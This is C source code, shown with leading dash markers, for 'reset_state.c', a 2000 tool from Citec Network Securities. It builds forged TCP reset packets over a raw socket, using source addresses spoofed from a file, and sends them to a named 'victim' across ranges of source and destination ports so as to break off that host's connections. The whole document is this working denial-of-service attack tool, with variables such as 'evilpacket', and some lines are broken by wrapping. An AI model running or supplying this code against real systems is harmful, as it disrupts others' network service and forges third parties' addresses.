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- /* reset_state.c (c) 2000 Citec Network Securities */
- /* The code following below is copyright Citec Network Securities */
- /* Code was developed for testing, and is written to compile under */
- /* FreeBSD */
- #define __BSD_SOURCE
- #include <stdio.h>
- #include <string.h>
- #include <stdlib.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <sys/wait.h>
- #include <netinet/in.h>
- #include <arpa/inet.h>
- #include <netinet/in_systm.h>
- #include <netinet/ip.h>
- #include <netinet/tcp.h>
- #include <unistd.h>
- #include <time.h>
- #include <netdb.h>
- struct slist {
- struct in_addr spoof;
- struct slist *link;
- }; /* Spoof list */
- int
- main(int argc, char *argv[])
- {
- int i, int2;
- int sock; /* Socket stuff */
- int on = 1; /* Socket stuff */
- struct sockaddr_in sockstruct; /* Socket stuff */
- struct ip *iphead; /* IP Header pointer */
- struct tcphdr *tcphead; /* TCP Header pointer */
- char evilpacket[sizeof(struct ip) + sizeof(struct
- tcphdr)];
- /* Our reset packet */
- int seq, ack; /* Sequence and Acknowledgement #'s
- */
- FILE *spooffile; /* Spoof file */
- char *buffer; /* Spoof file read buffer */
- struct slist *scur, *sfirst; /* Spoof linked list pointers */
- char src[20], dst[20]; /* Work around for inet_ntoa static
- */
- /* Pointers when using printf() */
- int sourcefrom, sourceto, destfrom, destto; /* CMD Line ports */
- int target; /* Target address from inet_addr()
- */
- if(argc < 6) {
- fprintf(stderr, "Usage: %s spoof_file target sps spe dps
- dpe\n"
- "target = your victim\n"
- "sps = Source port start\n"
- "spe = Source port end\n"
- "dps = Destination port start\n"
- "dpe = Destination port end\n", argv[0]);
- exit(-1);
- }
- else {
- sourcefrom = atoi(argv[3]);
- sourceto = atoi(argv[4]);
- destfrom = atoi(argv[5]);
- destto = atoi(argv[6]);
- };
- if(sourcefrom > sourceto) {
- printf("Error, start source port must be less than end
- source port\n");
- exit(-1);
- }
- else if(destfrom > destto) {
- printf("Error, start dest port must be less than end dest
- port\n");
- exit(-1);
- };
- printf("Used spoof file %s\n"
- "Destination: [%s] ports: [%d -> %d]\n"
- "Target source ports: [%d -> %d]\n",
- argv[1], argv[2], destfrom, destto, sourcefrom, sourceto);
- sleep(1);
- bzero(evilpacket, sizeof(evilpacket));
- /* Clean our reset packet */
- sfirst = malloc(sizeof(struct slist));
- scur = sfirst;
- scur->link = NULL; /* Setup our spoof linked list */
- if(!(buffer = malloc(25))) {
- perror("malloc");
- exit(-1);
- }; /* Allocate for read buffer */
- if ((spooffile = fopen((char *) argv[1], "r")) <= 0) {
- perror("fopen");
- exit(-1); /* Open our spoof file */
- } else {
- while (fgets(buffer, 25, spooffile)) { /* Read till EOF */
- if (!(inet_aton(buffer, &(scur->spoof))))
- printf("Invalid address found in victim
- file.. ignoring\n");
- else {
- scur->link = malloc(sizeof(struct slist));
- scur = scur->link;
- scur->link = NULL; /* Cycle l.list */
- }
- }; /* End of while loop */
- }; /* End of if {} else {} */
- free(buffer); /* Free up our read buffer */
- fclose(spooffile); /* Close our spoof file */
- scur = sfirst; /* Set spoof list current to first
- */
- if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
- perror("socket");
- exit(-1);
- } /* Allocate our raw socket */
- if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *) &on,
- sizeof(on)) < 0) {
- perror("setsockopt");
- exit(-1);
- } /* Set socket options for raw iphead
- */
- sockstruct.sin_family = AF_INET;
- iphead = (struct ip *) evilpacket;
- tcphead = (struct tcphdr *) (evilpacket + sizeof(struct ip));
- /* Align ip and tcp headers */
- iphead->ip_hl = 5; /* Ip header length is 5 */
- iphead->ip_v = 4; /* ipv4 */
- iphead->ip_len = sizeof(struct ip) + sizeof(struct tcphdr);
- /* Length of our total packet */
- iphead->ip_id = htons(getpid()); /* Packet ID == PID # */
- iphead->ip_ttl = 255; /* Time to live == 255 */
- iphead->ip_p = IPPROTO_TCP; /* TCP Packet */
- iphead->ip_sum = 0; /* No checksum */
- iphead->ip_tos = 0; /* 0 Type of Service */
- iphead->ip_off = 0; /* Offset is 0 */
- tcphead->th_win = htons(512); /* TCP Window is 512 */
- tcphead->th_flags = TH_RST; /* Reset packet */
- tcphead->th_off = 0x50; /* TCP Offset 0x50 */
- iphead->ip_dst.s_addr = inet_addr(argv[2]);
- srand(getpid()); /* Seed for rand() */
- while (scur->link != NULL) {
- seq = rand() % time(NULL); /* Randomize our #'s */
- ack = rand() % time(NULL); /* Randomize ack #'s */
- sockstruct.sin_port = htons(rand() % time(NULL));
- iphead->ip_src = scur->spoof; /* Set the spoofed address
- */
- sockstruct.sin_addr = scur->spoof;
- for(i = sourcefrom; i <= sourceto; i++) {
- for(int2 = destfrom; int2 <= destto; int2++) {
- usleep(2); /* Sleep 5ms between packets
- */
- seq += (rand() %10)+250;
- ack += (rand() %10)+250;
- tcphead->th_seq = htonl(seq);
- /* Set sequence number */
- tcphead->th_ack = htonl(ack);
- /* Set ack number */
- tcphead->th_dport = htons(int2);
- /* Set destination port */
- tcphead->th_sport = htons(i);
- /* Set source port */
- snprintf(src, 20, "%s",
- inet_ntoa(iphead->ip_src));
- snprintf(dst, 20, "%s",
- inet_ntoa(iphead->ip_dst));
- /* Copy info to src and dst for printing */
- printf("TCP RESET: [%s:%d] -> [%s:%d]\n",
- src, ntohs(tcphead->th_sport), dst, ntohs(tcphead->th_dport));
- sendto(sock, &evilpacket,
- sizeof(evilpacket), 0x0,
- (struct sockaddr *) & sockstruct,
- sizeof(sockstruct));
- /* Send our evil packet */
- };
- };
- scur = scur->link; /* Cycle the spoof ips */
- }
- scur = sfirst;
- return (1);
- };